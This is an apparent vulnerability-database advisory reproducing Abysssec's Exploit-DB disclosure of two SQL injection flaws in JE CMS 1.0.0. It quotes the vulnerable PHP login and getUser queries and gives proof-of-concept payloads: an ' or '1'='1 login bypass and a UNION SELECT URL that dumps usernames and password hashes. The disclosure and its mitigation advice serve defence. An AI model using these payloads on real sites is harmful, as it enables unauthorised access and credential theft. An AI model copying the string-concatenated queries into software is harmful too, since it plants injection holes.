JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

vendor:

JE CMS

by:

abysssec.com

7,5

CVSS

HIGH

Bypass Authentication by SQL Injection Vulnerability

CWE

Product Name: JE CMS

Affected Version From: JE CMS <= 1.0.0

Affected Version To: JE CMS <= 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:joenasejes.cz.cc:je_cms:1.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

JE CMS 1.0.0 is vulnerable to bypass authentication by SQL injection. In administrator/login.php page, lines 16-20, userLogin() function is in administrator/library/functions.php. In lines 129-139, the username and password are not properly sanitized before being used in a SQL query. This can be exploited to bypass authentication by entering a specially crafted username and password. In administrator/index.php file line 12, $userid is not properly sanitized before being used in a SQL query. This can be exploited to inject arbitrary SQL commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries that are executed against the database. All input data should be validated and filtered, and all SQL queries should be parameterized.

Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
'''

 
Title  : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
Affected Version : JE CMS <= 1.0.0
Vendor  Site   : joenasejes.cz.cc
Discovery : abysssec.com
  
 
Vulnerabilites :

1. Bypass Authentication by SQL Injection Vulnerability

in administrator\login.php page, lines 16-20:
if (isset($_REQUEST['username'])) {
	$username = $_REQUEST['username'];
	$password = $_REQUEST['password'];
	$result = $core->userLogin();
	
	
userLogin() function is in administrator\library\functions.php. in lines 129-139:
		if ($userName == '' || $password == '') {
			$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
		}  else {
			// check the database and see if the username and password combo do match
			$sql = "SELECT userid
					FROM users 
					WHERE username = '".$userName."' 		// vulnerability is here
					AND password = '".$this->getHash($password)."'	// vulnerability is here
					AND usertype = 1
					AND block = 0";
			$result = $this->JEQuery($sql);

POC:

in administrator/login.php:

username: admin' or '1'='1
password: admin' or '1'='1

2. SQL injection in administrator\index.php on "userid" parameter:

in administrator\index.php file line 12:
$userid			= 	$_REQUEST['userid'];
lines 52-53:
	case 'edituser' :
		$user = $core->getUser($userid);
		
getUser function is in administrator\library\functions.php file. lines 578-583:

	function getUser($id){
		
		$sql = "SELECT *
				FROM users
				WHERE userid = ".$id;	// vulnerability is here
		$result = $this->JEQuery($sql);

POC:

http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--